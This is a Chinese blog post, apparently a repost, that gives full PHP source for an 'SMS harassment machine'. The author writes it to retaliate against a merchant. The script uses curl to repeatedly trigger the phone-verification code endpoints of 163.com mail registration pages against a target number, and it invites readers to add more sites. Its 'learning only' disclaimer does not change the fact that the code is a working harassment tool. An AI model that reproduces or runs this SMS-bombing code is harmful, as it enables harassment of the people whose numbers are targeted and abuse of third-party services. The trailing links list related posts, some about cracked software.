php 构造骚扰短信发送机(仅供学习与参考,请勿用于非法用途)
最近在某宝买东西得罪了某黑心商家。。然后他就疯狂的给我发骚扰短信,烦死了。。。
短信大概就是利用一些网站的手机验证码来实现的。。
所以再被他疯狂骚扰后决定自己动手反击。。
php主要用到了curl的函数库扩展,然后主要要做的还是去抓包分析网站注册码的各个请求,
下面就主要来一个小的demo来详细说一下。。效率谈不上,仅限于娱乐。
1.sms.php
注意cookie文件一定要用绝对路径。。在这纠结了好久。。
其他的curlopt参数自己去查手册吧
还有里面缺少一些状态判断,可以自己去做,懒得搞了。。他一般返回json格式,还是很清楚的,剩余几次,是否已经注册都有信息可以提取。curl_exec()的返回值里有数据
1 <?php 2 ini_set('max_execution_time',0); 3 if(!isset($argv[1])){ 4 print("argv error"); 5 die(); 6 } 7 include_once("./webinfo.php"); 8 $exps = array(); 9 foreach ($webs as $key => $value) { 10 $exps[] = new $value($argv[1]); 11 } 12 for($i=1;$i<=3;$i++){ 13 print("this is {$i} send\n"); 14 foreach ($exps as $key => $value) { 15 if(!file_exists($value->cookieJar)){ 16 $fp = fopen(dirname(__FILE__)."/".$value->cookieJar, "w+"); 17 fclose($fp); 18 print("[+]create cookiefile {$value->cookieJar}\n"); 19 } 20 $ch = curl_init(); 21 curl_setopt($ch,CURLOPT_URL,$value->urlGetRawCookie); 22 curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__)."/".$value->cookieJar); 23 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 24 curl_setopt($ch, CURLOPT_HEADER, 0); 25 curl_exec($ch); 26 print("[+]get raw cookie ready\n"); 27 curl_setopt($ch, CURLOPT_COOKIEFILE,dirname(__FILE__)."/".$value->cookieJar); 28 if($value->urlCheckNum!=null){ 29 $checkUrl = $value->urlCheckNum; 30 foreach ($checkUrl as $k => $v) { 31 if($value->type=="post"){ 32 curl_setopt($ch, CURLOPT_URL, $v[0]); 33 curl_setopt($ch, CURLOPT_POST, true); 34 curl_setopt($ch, CURLOPT_POSTFIELDS, $v[1]); 35 }else{ 36 curl_setopt($ch, CURLOPT_URL, $v); 37 } 38 curl_exec($ch); 39 print("[+]check num ready\n"); 40 } 41 } 42 if($value->type=="post"){ 43 curl_setopt($ch, CURLOPT_POST, true); 44 curl_setopt($ch, CURLOPT_POSTFIELDS, $value->paras); 45 } 46 curl_setopt($ch, CURLOPT_COOKIEFILE,dirname(__FILE__)."/".$value->cookieJar); 47 curl_setopt($ch, CURLOPT_URL, $value->urlSendSMS); 48 curl_exec($ch); 49 print("[+]send sms ok \n begin the next... \n\n"); 50 } 51 if($i!=3){ 52 print("[--]we will begin the next send sms after 60s\n"); 53 sleep(60); 54 } 55 56 }
2.webinfo.php
1 <?php 2 /* 3 *本页面为网站信息数据 4 *$webs数组存放所有的 5 *$type为请求格式 6 * 7 *$urlGetRawCookie为原始登录网页网址,用来取得原始cookie并保存, 8 *因为一般他们会把验证码信息存在session中,若没有登录,就对应了cookie中的JSESSIONID,与http协议机制相关 9 * 10 *$urlCheckNum为最终发送网址之前的一些网址,保存为数组格式,若为post型,则保存为二维数组, 11 *最内层数组第一个元素为网址,第二个为post数据 12 * 13 *$urlSendSMS为最终发送网址,若为post型,post数据对应于$paras 14 * 15 *$cookieJar为cookie保存文件 16 */ 17 $webs = array("info163","info126"); 18 class Info163{ 19 public $type = "post"; 20 public $paras = ""; 21 public $urlGetRawCookie = "http://reg.email.163.com/unireg/call.do?cmd=register.entrance&from=163mail"; 22 public $urlCheckNum = null; 23 public $urlSendSMS = "http://reg.email.163.com/unireg/call.do?cmd=added.mobileverify.sendAcode"; 24 public $cookieJar = "cookie163.txt"; 25 public function info163($num){ 26 $this->paras = "mobile={$num}&uid={$num}@163.com&mark=mobile_start"; 27 } 28 29 } 30 class Info126{ 31 public $type = "get"; 32 public $urlGetRawCookie = "http://e.mail.163.com/mobilemail/home.do?from=163mail"; 33 public $urlCheckNum = null; 34 public $urlSendSMS = "http://e.mail.163.com/mobilemail/getVerifyCode.do?rnd=0.031214307695158909"; 35 public $cookieJar = "cookie126.txt"; 36 public function info126($num){ 37 $this->urlCheckNum = array( 38 "http://e.mail.163.com/mobilemail/service/jslog.do?mobile={$num}", 39 "http://e.mail.163.com/mobilemail/checkMobileBinded.do?mobile={$num}&rnd=0.5488968987483531" 40 ); 41 } 42 } 43 44 45 46 ?>
自己可以按照规则扩展webino里的数据,抓包可以用wireshark,不过http抓包个人感觉还是chrome自带的工具比较好用点
请勿用于非法用途,后果自负。
转载于:https://www.cnblogs.com/happyDays/p/3440741.html
php 构造骚扰短信发送机(仅供学习与参考,请勿用于非法用途)相关推荐
- Web安全攻防 信息收集篇(仅供交流学习使用,请勿用于非法用途)
Web安全攻防 准备篇 1. 信息收集 域名介绍: 域名(Domain Name),是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名 称,用于在数据传 输时标识计算机的电子方位 ...
- Photoshop CC 2017 安装与激活(Mac 版)(仅供学习研究,勿作商业用途)
Adobe Photoshop CC 2017是专业的图片制作工具.下面来介绍下安装步骤 步骤一. 下载官方的在线,登录Adobe账号,下载安装你要用的产品就可以下载到最新本的软件了 https:// ...
- 老司机人手必备xxlive 仅供学习交流 勿传播以及商业用途
一款直播聚合和影视聚合app,小朋友就别看了.已破解,无任何限制观看 点击下载
- python 正方教务管理系统抢课脚本(仅供学习)
正方教务管理系统抢课脚本 (仅供学习请勿它用!!!) 正方教务管理系统抢课脚本 进入正题 正方教务管理系统抢课脚本 该脚本使用python代码模拟发包实现.教务管理系统版本可能有所不同.请根据实际情况 ...
- zlc源码-众利模式 全新黑金UI客户运营版:仅供学习使用
本源码是目前众利模式的最新ZLC源码!请勿用作其他非法运营!可以学习使用!用作非法用途一切都与本人无关! 联系QQ:19198367 联系QQ:19198367 特别声明: 此源码仅供学习使用,请勿用 ...
- zlc源码-众利模式 全新海红UI客户运营版:仅供学习使用
本源码是目前众利模式的最新ZLC源码!请勿用作其他非法运营!可以学习使用!用作非法用途一切都与本人无关! 联系QQ:19198367 联系QQ:19198367 特别声明: 此源码仅供学习使用,请勿用 ...
- python图片裁剪对比_Python自动抢视频红包,仅供学习!
本文来源于公众号: AirPython 1 目 标 场 景 如今短视频横行的时代,以某短视频为首的,背后依靠着强大的资金后盾,疯狂地对平台用户进行红包轰炸. 与传统的红包不一样,视频红包包含位置的不确 ...
- python抢红包脚本_Python自动抢视频红包,仅供学习!
本文来源于公众号: AirPyt hon 1 目 标 场 景 如今短视频横行的时代,以某短视频为首的,背后依靠着强大的资金后盾,疯狂地对平台用户进行红包轰炸. 与传统的红包不一样,视频红包包含位置的不 ...
- python 抢单脚本_分享用Python写的99收抢单小脚本,仅供学习
实测挂2~3分钟可以刷到个10元,哈哈 在前面填写账号密码还有99开发者中心的私钥,然后用Python2跑即可 抢到单会自动暂停,但不会任何通知,请记得留意Log输出#!/usr/bin/python ...
最新文章
- IDEA提升研发效能—高效定位篇
- python设置背景音乐_python给视频添加背景音乐并改变音量的具体方法
- Java入门之HelloWorld
- CGI,BOA配置心得
- 多页面webpack配置
- 监控视图 oracle,Oracle“并行执行”之四——监控视图
- 修改hadoop中yarn的webui中显示的任务时间为中国时间
- 人脑、思维与认知的研究
- Python使用Reportlab处理PDF数据 - 页面布局
- 关于java开发阿里云视频直播的使用及掉坑、爬坑,欢迎入坑交流
- 漫话:如何给女朋友解释什么是语法糖?
- EasyExcel java实现excel简单读写操作(快速上手,复制粘贴即可)
- gitlab代码查看行数
- 门禁系统服务器需要什么要求,完备的门禁系统应该具有这些功能
- springboot+feign+nacos+seata+docker整合踏坑实录
- 富爸爸财务自由之路——财富自由之路的七个步骤
- WPS批量设置及批量打印文档
- “知了杯”第一届网页设计大赛在川职圆满落幕
- linux的nc命令退出,nc 命令使用详解
- 我国劳动法中关于高校应届毕业生就业协议及合同的一切条款